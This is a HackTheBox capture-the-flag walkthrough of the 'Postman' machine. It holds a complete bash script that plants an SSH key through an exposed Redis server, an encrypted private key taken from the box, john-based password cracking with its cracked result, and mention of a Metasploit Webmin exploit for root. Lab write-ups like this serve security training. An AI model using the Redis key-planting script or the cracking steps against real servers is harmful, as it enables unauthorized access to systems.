Saturday, March 14, 2020

Postman HackTheBox Walkthrough

Postman – HackTheBox Machine Walkthrough


Postman HackTheBox Walkthrough



Postman machine from HTB places in easy machines category still the method is difficult unless you not using Metasploit directly.



Nmap Scan

In Nmap scanning I found port  22, 80, 6379 -TCP /  redis and 10000 -TCP is open. You need to scan all ports otherwise port 6379 will not display.


Radis Enumeration & Exploit

Postman HackTheBox Walkthrough

After Nmap scanning is done we found port 6379 and port 10000 are interesting so after some work, I found on 10000 port there is the Webmin login page. On port 6379 which name is redis, I find on google about radis and I got 1 interesting link-


Using these commands you can make script or use them directly.


Redis Script

#!/bin/bash       rm ~/.ssh/id*   ssh-keygen -t rsa       (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "n\n") > foo.txt       redis-cli -h 10.10.10.160 flushall    cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit    redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/   redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"   redis-cli -h 10.10.10.160 save       ssh -i ~/.ssh/id_rsa redis@10.10.10.160 

Source: https://github.com/Tatik07/Hackthebox/blob/master/Redis_exploit.sh

After using that script I can access Redis shell. In-home directory we can see the user name is Matt


Privilege Escalation

After using LinEnum script & searching some directories got ssh RSA key in /opt Directory.


-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

We need to crack this key so we can use ssh2john.py tool then crack that key using john tool with rockyou.txt

 # python3 /usr/share/john/ssh2john.py key.txt > loll
#john --wordlist (rockyou location) ( filename )

Postman HackTheBox Walkthrough


The password is computer2008 & the user is Matt.


Webmin Exploit Using Metasploit

There are many exploits of webmin. After using packageup remote exploit got root access.

Postman HackTheBox Walkthrough


 &

Postman HackTheBox Walkthrough